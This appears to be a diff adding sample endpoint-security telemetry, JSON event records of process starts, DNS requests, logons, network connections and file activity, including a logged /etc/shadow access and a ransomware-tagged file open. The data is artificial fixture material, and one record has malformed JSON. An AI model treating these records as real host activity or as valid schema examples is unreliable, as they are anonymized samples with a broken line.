+{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","ContextProcessId":"311775981885093125","ContextThreadId":"0","ContextTimeStamp":"1604855101.341","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"10507","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"311775981885093125","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"EndOfProcessMacV12","timestamp":"1604855100139"}
+{"AuthenticationId":"999","CommandLine":"D:\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe 
--ps2","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume2\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe","ImageSubsystem":"3","IntegrityLevel":"16384","MD5HashData":"571391f723a439e985a2064337e2802a","ParentAuthenticationId":"999","ParentBaseFileName":"splunkd.exe","ParentProcessId":"17346335177","ProcessCreateFlags":"67634688","ProcessEndTime":"","ProcessParameterFlags":"24577","ProcessStartTime":"1604855099.406","ProcessSxsFlags":"64","RawProcessId":"6116","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720","SessionId":"0","SourceProcessId":"17346335177","SourceThreadId":"107650023406","Tags":"27, 151, 12094627905582, 12094627906234","TargetProcessId":"583707537390","TokenType":"1","UserSid":"S-1-5-18","WindowFlags":"384","aid":"ffffffff3a5a424fa02450da53619745","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-a09e-06f79d630255","name":"ProcessRollup2V17","timestamp":"1604855100030"}
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2784638081","ContextProcessId":"259090530891","ContextThreadId":"16409623709004","ContextTimeStamp":"1604855095.961","DnsRequestCount":"1","DomainName":"comp1.dom2","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff4f1444bab96568879cb43556","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DnsRequest","id":"ffffffff-1111-11eb-8077-0606f7dcf2ed","name":"DnsRequestV3","timestamp":"1604855099913"}
+{"ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","ContextProcessId":"321385820045701199","ContextThreadId":"0","ContextTimeStamp":"1604855101.645","Entitlements":"15","GID":"0","TargetFileName":"/etc/shadow","UID":"0","UnixMode":"32768","aid":"ffffffff32ba43a483e76c6f0a4aa26f","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"CriticalFileAccessed","id":"ffffffff-1111-11eb-b70d-027f9ced2001","name":"CriticalFileAccessedLinV1","timestamp":"1604855102247"}
+{"CommandLine":"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","Entitlements":"15","GID":"0","ImageFileName":"/usr/bin/plutil","MD5HashData":"d51cef1b288e2032aee9805deff04bfd","MachOSubType":"1","ParentProcessId":"311774817965726568","ProcessEndTime":"","ProcessGroupId":"311774817965726568","ProcessStartTime":"1604855111.240","RGID":"0","RUID":"0","RawProcessId":"10692","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SVGID":"0","SVUID":"0","SourceProcessId":"311776004953765502","SourceThreadId":"0","Tags":"27, 12094627905582, 12094627906234","TargetProcessId":"311776004953765502","UID":"0","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"ProcessRollup2MacV3","timestamp":"1604855109180"}
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3899738370","ContextProcessId":"1546527409909","ContextThreadId":"4711690090889","ContextTimeStamp":"1604855114.133","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00","FileObject":"18446655033844205120","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"88080484","ShareAccess":"1","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Windows\\Temp\\__PSScriptPolicyTest_dvkjnbka.apn.ps1","aid":"ffffffff8f1e4b77b4dae5debaa1c8bc","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewScriptWritten","id":"ffffffff-1111-11eb-80b5-06e11a66e03d","name":"NewScriptWrittenV7","timestamp":"1604855114427"}
+{"ConfigBuild":"1007.4.0012205.1","ConfigStateHash":"1306766522","ConnectionDirection":"1","ConnectionFlags":"0","ContextProcessId":"321275232072440993","ContextTimeStamp":"1604855116.421","Entitlements":"15","InContext":"0","LocalAddressIP4":"0.0.0.0","LocalPort":"0","Protocol":"6","RemoteAddressIP4":"67.43.156.14","RemotePort":"443","aid":"ffffffffd4094240a6b1d12aaf304f4f","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-aca9-02683aed2a0d","name":"NetworkConnectIP4MacV5","timestamp":"1604855116502"}
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2602391615","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"223442259384","ContextTimeStamp":"1604855116.849","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"67.43.156.14","LocalPort":"53961","Protocol":"6","RemoteAddressIP4":"67.43.156.14","RemotePort":"443","aid":"fffffffff000426eb99afaa2ccdcbc17","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-b0eb-06be7616c211","name":"NetworkConnectIP4V5","timestamp":"1604855116942"}
+{"AuthenticationId":"6580764513","AuthenticationPackage":"Negotiate","ClientComputerName":"-","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"816054990879","ContextThreadId":"52913017705957","ContextTimeStamp":"1604855091.781","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"NT AUTHORITY","LogonServer":"","LogonTime":"1604855091.781","LogonType":"9","PasswordLastSet":"","RemoteAccount":"1","UserFlags":"0","UserIsAdmin":"0","UserLogonFlags":"12","UserName":"SYSTEM","UserPrincipal":"user4@dom2","UserSid":"S-1-5-18","aid":"ffffffff8d2e4b4f9b21b40633a8d579","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogon","id":"ffffffff-1111-11eb-a8cf-0649c95cfa1d","name":"UserLogonV8","timestamp":"1604855121077"}
+{"AuthenticationId":"2007206396","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"4415814628770","ContextThreadId":"41392001729898","ContextTimeStamp":"1604855120.785","DiskParentDeviceInstanceId":"PCI\\VEN_1000\u0026DEV_0054\u0026SUBSYS_197615AD\u0026REV_01\\4\u00261f16fef7\u00260\u002600A8","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c","FileObject":"18446708893089967904","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","IsTransactedFile":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","SHA256HashData":"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182","Size":"6144","TargetFileName":"\\Device\\HarddiskVolume2\\Users\\user10\\AppData\\Local\\Temp\\ec1ijefl.dll","TokenType":"1","aid":"ffffffff2c47454cba360bc404a607bb","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PeFileWritten","id":"ffffffff-1111-11eb-b091-06f6cca0a049","name":"PeFileWrittenV14","timestamp":"1604855121109"}
+{"AuthenticationId":"317005428","AuthenticationPackage":"Negotiate","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3950066843","EffectiveTransmissionClass":"2","Entitlements":"15","LogoffTime":"1604855132.756","LogonDomain":"dom1","LogonServer":"srv2","LogonTime":"1604855131.666","LogonType":"7","PasswordLastSet":"1598119332.510","RemoteAccount":"1","UserFlags":"32","UserIsAdmin":"0","UserLogoffType":"3","UserLogonFlags":"0","UserName":"user4","UserPrincipal":"user.name@dom2.com","UserSid":"S-1-5-21-606747145-1364589140-725345543-28636","aid":"ffffffffe0104823bd3de859d5bc8bc7","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogoff","id":"ffffffff-1111-11eb-8913-0287fd11c79b","name":"UserLogoffV3","timestamp":"1604855134461"}
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"537307300","ContextProcessId":"635780922149","ContextThreadId":"9479299143023","ContextTimeStamp":"1604855025.966","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"0e02a8c7ed9d244887cef0409af0e6190030000000001100","FileObject":"18446695174291796544","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"83886176","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Program Files\\Snow Software\\Inventory\\Agent\\cloudmeteringhost.exe","aid":"ffffffff425942f58382dbb11350eeda","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableWritten","id":"ffffffff-1111-11eb-93cb-067deb43537b","name":"NewExecutableWrittenV1","timestamp":"1604855149643"}
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"50714198593318","ContextThreadId":"194302491825207","ContextTimeStamp":"1604855150.066","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"59491","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffa51b4acf9dbc1fc273e6145c","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"NetworkListenIP4V5","timestamp":"1604855150545"}
+{"ClientComputerName":"com1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"7073822473144","ContextThreadId":"48689911139327","ContextTimeStamp":"1604855152.993","EffectiveTransmissionClass":"2","Entitlements":"15","EtwRawProcessId":"744","EtwRawThreadId":"5304","LogonDomain":"BROADCAST","LogonType":"3","RemoteAddressIP4":"67.43.156.14","Status":"3221225581","SubStatus":"3221225578","UserName":"user5","aid":"ffffffffd8844a59acce5e1f4ad01888","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed2","id":"ffffffff-1111-11eb-a8aa-067029dffccb","name":"UserLogonFailed2V2","timestamp":"1604855154274"}
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextProcessId":"1838383212125","ContextThreadId":"27242382481217","ContextTimeStamp":"1604855151.534","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff","FileObject":"18446636884348143072","IrpFlags":"1028","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Program Files\\WindowsApps\\Deleted\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\clrcompression.dll","aid":"ffffffff4a0946365161093453e596d4","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ExecutableDeleted","id":"ffffffff-1111-11eb-b23b-064dea059649","name":"ExecutableDeletedV3","timestamp":"1604855154670"}
+{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009202.1","ConfigStateHash":"230795414","ContextProcessId":"318137549555284836","ContextThreadId":"0","ContextTimeStamp":"1604855135.209","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"20195","SHA256HashData":"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"318137549555284836","aid":"ffffffffcfe84e8c6a52c4001bd83761","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-ae31-065d76bec0c3","name":"EndOfProcessMacV11","timestamp":"1604855160047"}
+{"ApiReturnValue":"1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"683078218537","ContextTimeStamp":"1604855171.731","EffectiveTransmissionClass":"3","Entitlements":"15","EtwRawProcessId":"19400","EtwRawThreadId":"9384","aid":"ffffffff80984ea8b49d9a53f590c566","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RegisterRawInputDevicesEtw","id":"ffffffff-1111-11eb-a570-0685ba2a382f","name":"RegisterRawInputDevicesEtwV1","timestamp":"1604855173077"}
+{"CompletionEventId":"Event_ChannelDataDownloadCompleteV1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","DownloadPath":"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys","DownloadPort":"443","DownloadServer":"lfodown01-b.cloudsink.net","EffectiveTransmissionClass":"0","Entitlements":"15","TargetFileName":"C-00000013-00000000-00000408.sys","aid":"ffffffffffc94c645268f64fc900213f","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"LFODownloadConfirmation","id":"ffffffff-1111-11eb-8ab5-0643392fc75d","name":"LFODownloadConfirmationV1","timestamp":"1604855174018"}
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"2071361595421","ContextThreadId":"41650430047375","ContextTimeStamp":"1604855146.590","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","FileObject":"18446622606546437424","IrpFlags":"395312","MajorFunction":"6","MinorFunction":"0","NewFileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","OperationFlags":"0","SourceFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\temp\\EKA0UARWWK\\Microsoft.WSMan.Management.ni.dll","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.We0722664#\\c2579d00f9849413b8b7948dd00ac863\\Microsoft.WSMan.Management.ni.dll","aid":"ffffffff280b41b956a91e816bd9b9b0","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8162-0663305b686f","name":"NewExecutableRenamedV6","timestamp":"1604855177513"}
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"402097454","ContextProcessId":"66601077523","ContextThreadId":"2500785639062","ContextTimeStamp":"1604855165.213","DesiredAccess":"1048577","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700","FileObject":"18446641334185168032","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"35668001","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\CbsTemp\\30848497_1904507751\\FodWU","aid":"ffffffff2c9f4066b0b5f2f00265503c","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DirectoryCreate","id":"ffffffff-1111-11eb-9411-06b7c99be087","name":"DirectoryCreateV1","timestamp":"1604855180332"}
+{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextTimeStamp":"1604855196.468","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"949196415400","RpcClientThreadId":"44209361549673","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"wlidsvc","TargetProcessId":"955370934902","TokenType":"1","UserName":"user6","aid":"fffffffffcc4413057adc260e99b0774","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ServiceStarted","id":"ffffffff-1111-11eb-9c98-02c501fe7d81","name":"ServiceStartedV2","timestamp":"1604855196635"}
+{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"319255017313886870","ContextTimeStamp":"1604855200.751","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"0","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:1","RemotePort":"2181","aid":"ffffffffed0f41575620ab9fb25ce105","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-81f1-061cdebbd115","name":"NetworkConnectIP6MacV5","timestamp":"1604855200836"}
+{"AuthenticationId":"1656178821","AuthenticationPackage":"Kerberos","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"30254389526587","ContextThreadId":"275230771323179","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"dom1","LogonId":"1656178821","LogonServer":"srv1","LogonTime":"1604855211.249","LogonType":"5","PasswordLastSet":"1530626210.104","RemoteAccount":"1","SessionId":"0","UserCanonical":"","UserFlags":"32","UserIsAdmin":"0","UserLogonFlags":"0","UserName":"user7","UserPrincipal":"user7@dom4.cm","UserSid":"S-1-5-21-606747145-1364589140-725345543-183372","aid":"ffffffff73164cfa9656c4caff8a2a38","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-86e3-02db1faa1327","name":"UserIdentityV2","timestamp":"1604855212031"}
+{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s 
NetSetupSvc","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"4193986770","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","ImageSubsystem":"2","IntegrityLevel":"16384","MD5HashData":"8a0a29438052faed8a2532da50455756","ParentAuthenticationId":"999","ParentProcessId":"2881931477041","ProcessCreateFlags":"525324","ProcessEndTime":"","ProcessParameterFlags":"8193","ProcessStartTime":"1604842733.215","ProcessSxsFlags":"64","RawProcessId":"6160","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6","SessionId":"0","SourceProcessId":"2881931477041","SourceThreadId":"70316664105336","Tags":"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297","TargetProcessId":"2882232404222","TokenType":"2","UserSid":"S-1-5-18","WindowFlags":"128","aid":"ffffffffbe8a46386afe80c5ef64d0b5","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-b4f9-06e3a7e5503b","name":"ProcessRollup2V16","timestamp":"1604855237946"} 
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"1016182570608","ContextThreadId":"37343520154472","ContextTimeStamp":"1604829512.519","DesiredAccess":"1179785","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00","FileObject":"18446670458156489088","Information":"1","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"16777312","ShareAccess":"5","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user11\\Downloads\\file.pptx","aid":"ffffffffac4148947ed68497e89f3308","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RansomwareOpenFile","id":"ffffffff-1111-11eb-9756-06fe7f8f682f","name":"RansomwareOpenFileV4","timestamp":"1604855242091"}
+{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"13532","ConHostProcessId":"1731198143955","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"2030177841","ContextData":"","ContextProcessId":"1741732942772","ContextThreadId":"28523520529271","ContextTimeStamp":"1604855274.377","CycleTime":"473618996","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"0","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"0","GenericFileWrittenCount":"0","ImageSubsystem":"2","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"1406250","MaxThreadCount":"16","ModuleLoadCount":"72","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"1731198143955",
PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855154.465","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"18176","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"1741732942772","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-12-1-1647509123-1308660782-3901357462-3999411581","UserTime":"781250","aid":"fffffffffdab492a5a20cd0417395a73","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-b685-0241eaddc553","name":"EndOfProcessV14","timestamp":"1604855276657"} 
+{"AuthenticationId":"895027","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1786917081743","ContextThreadId":"31685015444484","ContextTimeStamp":"1604855317.892","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"0000000000000000be341bb58bc5f1f2a24339010200510e","FileObject":"18446636933702558240","IrpFlags":"1028","IsOnNetwork":"1","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"223989","TargetFileName":"\\Device\\Mup\\intranet.dev\\int\\Test.pptx","TokenType":"1","aid":"fffffffffa474d216472f3edb73c75ed","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"OoxmlFileWritten","id":"ffffffff-1111-11eb-9165-067ee18a7975","name":"OoxmlFileWrittenV11","timestamp":"1604855329571"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"439029805661","ContextThreadId":"273683743193497","ContextTimeStamp":"1604855351.158","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","LocalPort":"50373","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffff1f924e228a807ea4c0f21b0b","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-85f5-02ab029194b9","name":"NetworkListenIP6V5","timestamp":"1604855351798"} 
+{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","ContextProcessId":"321365562189152025","ContextThreadId":"0","ContextTimeStamp":"1604846070.744","Entitlements":"15","SHA256HashData":"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d","Size":"29646","TargetFileName":"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc","VnodeModificationType":"10","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"AsepFileChange","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"AsepFileChangeMacV2","timestamp":"1604855355495"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"2932136","ContextThreadId":"36157339485804","ContextTimeStamp":"1604855191.803","EffectiveTransmissionClass":"2","Entitlements":"15","LogonTime":"","PasswordLastSet":"","UserLogonFlags":"1","UserName":"user7","UserSid":"S-1-5-10","aid":"ffffffffa5bd4efaa195a7132c576edc","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed","id":"ffffffff-1111-11eb-aa5a-0207e26418af","name":"UserLogonFailedV1","timestamp":"1604855193422"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1858880895","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"56042872298","ContextTimeStamp":"1604855136.669","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","LocalPort":"49689","Protocol":"6","RemoteAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","RemotePort":"443","aid":"ffffffff6854438eb4181691ec47e43d","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-a889-061944805289","name":"NetworkConnectIP6V5","timestamp":"1604855199798"} 
+{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"321382909294815631","ContextThreadId":"0","ContextTimeStamp":"1604853755.987","Entitlements":"15","SHA256HashData":"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583","Size":"165","SourceFileName":"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq","TargetFileName":"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478","aid":"ffffffffc07b49d6b7426e970523671a","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8773-06939a2f0915","name":"NewExecutableRenamedMacV1","timestamp":"1604855213224"} 